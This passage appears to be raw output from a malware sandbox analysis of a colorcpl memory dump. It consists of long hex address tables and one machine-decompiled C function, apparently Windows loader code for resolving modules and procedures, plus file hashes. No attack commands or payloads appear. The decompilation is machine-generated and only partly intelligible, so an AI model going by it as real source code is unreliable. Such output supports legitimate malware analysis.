                                                                                                0x06e7e193
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e341da
                                                                                                0x06e341da
                                                                                                0x06e341df
                                                                                                0x06e341e4
                                                                                                0x06e341ec
                                                                                                0x06e34203
                                                                                                0x06e34207
                                                                                                0x06e7e1fd
                                                                                                0x06e34222
                                                                                                0x06e34226
                                                                                                0x06e7e1f3
                                                                                                0x06e7e1f3
                                                                                                0x06e3422c
                                                                                                0x06e3422c
                                                                                                0x06e34233
                                                                                                0x06e7e1ed
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e34239
                                                                                                0x06e34239
                                                                                                0x06e34239
                                                                                                0x06e34239
                                                                                                0x06e34233
                                                                                                0x06e34226
                                                                                                0x06e341ee
                                                                                                0x06e341ee
                                                                                                0x06e341f4
                                                                                                0x06e34575
                                                                                                0x06e7e1b1
                                                                                                0x06e7e1b1
                                                                                                0x00000000
                                                                                                0x06e3457b
                                                                                                0x06e3457b
                                                                                                0x06e34582
                                                                                                0x06e7e1ab
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e34588
                                                                                                0x06e34588
                                                                                                0x06e3458c
                                                                                                0x06e7e1c4
                                                                                                0x06e7e1c4
                                                                                                0x00000000
                                                                                                0x06e34592
                                                                                                0x06e34592
                                                                                                0x06e34599
                                                                                                0x06e7e1be
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e3459f
                                                                                                0x06e3459f
                                                                                                0x06e345a3
                                                                                                0x06e7e1d7
                                                                                                0x06e7e1e4
                                                                                                0x00000000
                                                                                                0x06e345a9
                                                                                                0x06e345a9
                                                                                                0x06e345b0
                                                                                                0x06e7e1d1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e345b6
                                                                                                0x06e345b6
                                                                                                0x06e345b6
                                                                                                0x00000000
                                                                                                0x06e345b6
                                                                                                0x06e345b0
                                                                                                0x06e345a3
                                                                                                0x06e34599
                                                                                                0x06e3458c
                                                                                                0x06e34582
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e341f4
                                                                                                0x06e3423e
                                                                                                0x06e34241
                                                                                                0x06e345c0
                                                                                                0x06e345c4
                                                                                                0x00000000
                                                                                                0x06e345ca
                                                                                                0x06e345ca
                                                                                                0x00000000
                                                                                                0x06e7e207
                                                                                                0x06e7e20f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e345d1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e345ca
                                                                                                0x00000000
                                                                                                0x06e34247
                                                                                                0x06e34247
                                                                                                0x06e34247
                                                                                                0x06e34249
                                                                                                0x06e34249
                                                                                                0x06e34249
                                                                                                0x06e34251
                                                                                                0x06e34251
                                                                                                0x06e34257
                                                                                                0x06e3425f
                                                                                                0x06e3426e
                                                                                                0x06e34270
                                                                                                0x06e3427a
                                                                                                0x06e7e219
                                                                                                0x06e7e219
                                                                                                0x06e34280
                                                                                                0x06e34282
                                                                                                0x06e34456
                                                                                                0x06e345ea
                                                                                                0x00000000
                                                                                                0x06e345f0
                                                                                                0x06e7e223
                                                                                                0x00000000
                                                                                                0x06e7e223
                                                                                                0x06e3445c
                                                                                                0x06e3445c
                                                                                                0x00000000
                                                                                                0x06e3445c
                                                                                                0x00000000
                                                                                                0x06e34288
                                                                                                0x06e3428c
                                                                                                0x06e7e298
                                                                                                0x06e34292
                                                                                                0x06e34292
                                                                                                0x06e3429e
                                                                                                0x06e342a3
                                                                                                0x06e342a7
                                                                                                0x06e342ac
                                                                                                0x06e7e22d
                                                                                                0x06e342b2
                                                                                                0x06e342b2
                                                                                                0x06e342b9
                                                                                                0x06e342bc
                                                                                                0x06e342c2
                                                                                                0x06e342ca
                                                                                                0x06e342cd
                                                                                                0x06e342cd
                                                                                                0x06e342d4
                                                                                                0x06e3433f
                                                                                                0x06e3433f
                                                                                                0x06e342d6
                                                                                                0x06e342d6
                                                                                                0x06e342d9
                                                                                                0x06e342dd
                                                                                                0x06e342eb
                                                                                                0x06e7e23a
                                                                                                0x06e342f1
                                                                                                0x06e34305
                                                                                                0x06e3430d
                                                                                                0x06e34315
                                                                                                0x06e34318
                                                                                                0x06e3431f
                                                                                                0x06e34322
                                                                                                0x06e3432e
                                                                                                0x06e3433b
                                                                                                0x06e3433b
                                                                                                0x00000000
                                                                                                0x06e3432e
                                                                                                0x06e342eb
                                                                                                0x06e3434c
                                                                                                0x06e3434e
                                                                                                0x06e34352
                                                                                                0x06e34359
                                                                                                0x06e3435e
                                                                                                0x06e34361
                                                                                                0x06e3436e
                                                                                                0x06e3438a
                                                                                                0x06e3438e
                                                                                                0x06e34396
                                                                                                0x06e3439e
                                                                                                0x06e343a1
                                                                                                0x06e343ad
                                                                                                0x06e343bb
                                                                                                0x06e343bb
                                                                                                0x06e343ad
                                                                                                0x06e3436e
                                                                                                0x06e343bf
                                                                                                0x06e343c5
                                                                                                0x06e34463
                                                                                                0x06e34463
                                                                                                0x06e343ce
                                                                                                0x06e343d5
                                                                                                0x06e343d9
                                                                                                0x06e343df
                                                                                                0x06e34475
                                                                                                0x06e34479
                                                                                                0x06e34491
                                                                                                0x06e34491
                                                                                                0x06e34479
                                                                                                0x06e343e5
                                                                                                0x06e343eb
                                                                                                0x06e343f4
                                                                                                0x06e343f6
                                                                                                0x06e343f9
                                                                                                0x06e343fc
                                                                                                0x06e343ff
                                                                                                0x06e344e8
                                                                                                0x06e344ed
                                                                                                0x06e344f3
                                                                                                0x06e7e247
                                                                                                0x00000000
                                                                                                0x06e344f9
                                                                                                0x06e34504
                                                                                                0x06e34508
                                                                                                0x06e3450f
                                                                                                0x06e7e269
                                                                                                0x00000000
                                                                                                0x06e34515
                                                                                                0x06e34519
                                                                                                0x06e34531
                                                                                                0x06e34534
                                                                                                0x06e34537
                                                                                                0x06e3453e
                                                                                                0x06e34541
                                                                                                0x06e3454a
                                                                                                0x06e7e255
                                                                                                0x06e7e255
                                                                                                0x06e7e25b
                                                                                                0x06e7e25e
                                                                                                0x06e7e261
                                                                                                0x06e7e261
                                                                                                0x06e34555
                                                                                                0x06e34559
                                                                                                0x06e3455d
                                                                                                0x06e7e26d
                                                                                                0x06e7e270
                                                                                                0x06e7e274
                                                                                                0x06e7e27a
                                                                                                0x06e7e27d
                                                                                                0x06e7e28e
                                                                                                0x06e7e28e
                                                                                                0x06e34563
                                                                                                0x06e34563
                                                                                                0x06e34569
                                                                                                0x06e34569
                                                                                                0x00000000
                                                                                                0x06e3455d
                                                                                                0x06e3450f
                                                                                                0x00000000
                                                                                                0x06e344f3
                                                                                                0x06e343ff
                                                                                                0x06e34405
                                                                                                0x06e34405
                                                                                                0x06e34405
                                                                                                0x06e342ac
                                                                                                0x06e3428c
                                                                                                0x06e34282
                                                                                                0x06e34407
                                                                                                0x06e3440d
                                                                                                0x06e7e2af
                                                                                                0x06e7e2af
                                                                                                0x06e34413
                                                                                                0x06e34413
                                                                                                0x00000000
                                                                                                0x06e341d4
                                                                                                0x00000000
                                                                                                0x06e341c3
                                                                                                0x06e341bd
                                                                                                0x06e34415
                                                                                                0x06e34415
                                                                                                0x06e34416
                                                                                                0x06e34417
                                                                                                0x06e34429
                                                                                                0x06e3416e
                                                                                                0x06e3416e
                                                                                                0x06e34175
                                                                                                0x06e34498
                                                                                                0x06e3449f
                                                                                                0x06e7e12d
                                                                                                0x00000000
                                                                                                0x06e7e133
                                                                                                0x00000000
                                                                                                0x06e7e133
                                                                                                0x06e344a5
                                                                                                0x06e344a5
                                                                                                0x06e344aa
                                                                                                0x00000000
                                                                                                0x06e344bb
                                                                                                0x06e344ca
                                                                                                0x06e344d6
                                                                                                0x06e344d7
                                                                                                0x06e344d8
                                                                                                0x06e344e3
                                                                                                0x06e344e3
                                                                                                0x06e344aa
                                                                                                0x06e3417b
                                                                                                0x06e3417b
                                                                                                0x06e3417b
                                                                                                0x00000000
                                                                                                0x06e3417b
                                                                                                0x06e34175
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8716589181f1d4dc4dddfd3651693eb5082ab731de4eef4a3c940b8105754db6
                                                                                                • Instruction ID: ff28e6f716f86332e35f4836869dbe468110020b8c973457bd7a3c6b6601933b
                                                                                                • Opcode Fuzzy Hash: 8716589181f1d4dc4dddfd3651693eb5082ab731de4eef4a3c940b8105754db6
                                                                                                • Instruction Fuzzy Hash: 84F17E70908361CFD794CF18C484A7AB7E1EF88708F15696EF896CB290E734D995CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E2D5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 87%
                                                                                                			E06E2D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x6f0d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E06E26600(0x6f052d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x6f07b9c; // 0x0
							_t281 = L06E34620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E06E5F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x6f07b90; // 0x77090000
								if(_t384 == 0) {
									_t353 =  *0x6f07b8c; // 0xe22bb8
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E06E32280(_t200, 0x6f084d8);
									_t277 =  *0x6f085f4; // 0xe29940
									_t351 =  *0x6f085f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xe298d8
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E06E2FFB0(_t287, _t353, 0x6f084d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E06E6CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E06E26600(0x6f052d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E06E27926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x6f0b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E06E9E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x6f08472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x6f0b218; // 0x0
														asm("ror edi, cl");
														 *0x6f0b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E06E32280(_t250, 0x6f084d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L06E53898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E06E2FFB0(_t293, _t353, 0x6f084d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E06E537F5(_t353, 0);
																}
																E06E50413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E06E49B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E06E402D6(_t174);
																}
																L06E377F0( *0x6f07b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E06E4C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L06E2EC7F(_t353);
										L06E419B8(_t287, 0, _t353, 0);
										_t200 = E06E1F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E06E5B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x6f0b2f8; // 0x1160000
									if((_t206 |  *0x6f0b2fc) == 0 || ( *0x6f0b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x6f0b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E06EC6B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E06EC6AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E06E2E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L06E2EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E06E59730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E06E2E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L06E28F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E06E53C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                                                                                0x06e2d5f2
                                                                                                0x06e2d5f5
                                                                                                0x06e2d5f5
                                                                                                0x06e2d5fd
                                                                                                0x06e2d600
                                                                                                0x06e2d60a
                                                                                                0x06e2d60d
                                                                                                0x06e2d617
                                                                                                0x06e2d61d
                                                                                                0x06e2d627
                                                                                                0x06e2d62e
                                                                                                0x06e2d911
                                                                                                0x06e2d913
                                                                                                0x00000000
                                                                                                0x06e2d919
                                                                                                0x06e2d919
                                                                                                0x06e2d919
                                                                                                0x06e2d634
                                                                                                0x06e2d634
                                                                                                0x06e2d634
                                                                                                0x06e2d634
                                                                                                0x06e2d640
                                                                                                0x06e2d8bf
                                                                                                0x00000000
                                                                                                0x06e2d646
                                                                                                0x06e2d646
                                                                                                0x06e2d64d
                                                                                                0x06e2d652
                                                                                                0x06e7b2fc
                                                                                                0x06e7b2fc
                                                                                                0x06e7b302
                                                                                                0x06e7b33b
                                                                                                0x06e7b341
                                                                                                0x00000000
                                                                                                0x06e7b304
                                                                                                0x06e7b304
                                                                                                0x06e7b319
                                                                                                0x06e7b31e
                                                                                                0x06e7b324
                                                                                                0x06e7b326
                                                                                                0x06e7b332
                                                                                                0x06e7b347
                                                                                                0x06e7b34c
                                                                                                0x06e7b351
                                                                                                0x06e7b35a
                                                                                                0x00000000
                                                                                                0x06e7b328
                                                                                                0x06e7b328
                                                                                                0x00000000
                                                                                                0x06e7b328
                                                                                                0x06e7b326
                                                                                                0x06e2d658
                                                                                                0x06e2d658
                                                                                                0x06e2d65b
                                                                                                0x06e2d665
                                                                                                0x00000000
                                                                                                0x06e2d66b
                                                                                                0x06e2d66b
                                                                                                0x06e2d66b
                                                                                                0x06e2d66b
                                                                                                0x06e2d66d
                                                                                                0x06e2d672
                                                                                                0x06e2d67a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e2d680
                                                                                                0x06e2d686
                                                                                                0x06e2d8ce
                                                                                                0x06e2d8d4
                                                                                                0x06e2d8dd
                                                                                                0x06e2d8e0
                                                                                                0x06e2d68c
                                                                                                0x06e2d691
                                                                                                0x06e2d69d
                                                                                                0x06e2d6a2
                                                                                                0x06e2d6a7
                                                                                                0x06e2d6b0
                                                                                                0x06e2d6b5
                                                                                                0x06e2d6e0
                                                                                                0x06e2d6b7
                                                                                                0x06e2d6b7
                                                                                                0x06e2d6b9
                                                                                                0x06e2d6b9
                                                                                                0x06e2d6bb
                                                                                                0x06e2d6bd
                                                                                                0x06e2d6ce
                                                                                                0x06e2d6d0
                                                                                                0x06e2d6d2
                                                                                                0x06e7b363
                                                                                                0x06e7b365
                                                                                                0x00000000
                                                                                                0x06e7b36b
                                                                                                0x00000000
                                                                                                0x06e7b36b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e2d6bf
                                                                                                0x06e2d6bf
                                                                                                0x06e2d6e5
                                                                                                0x06e2d6e7
                                                                                                0x06e2d6e9
                                                                                                0x06e2d6ec
                                                                                                0x06e2d6ec
                                                                                                0x06e2d6ef
                                                                                                0x06e2d6f5
                                                                                                0x06e2d6f9
                                                                                                0x06e2d6fb
                                                                                                0x06e2d6fd
                                                                                                0x06e2d701
                                                                                                0x06e2d703
                                                                                                0x06e2d70a
                                                                                                0x06e2d70a
                                                                                                0x06e2d701
                                                                                                0x06e2d710
                                                                                                0x06e2d710
                                                                                                0x06e2d6c1
                                                                                                0x06e2d6c1
                                                                                                0x06e2d6c6
                                                                                                0x06e7b36d
                                                                                                0x06e7b36f
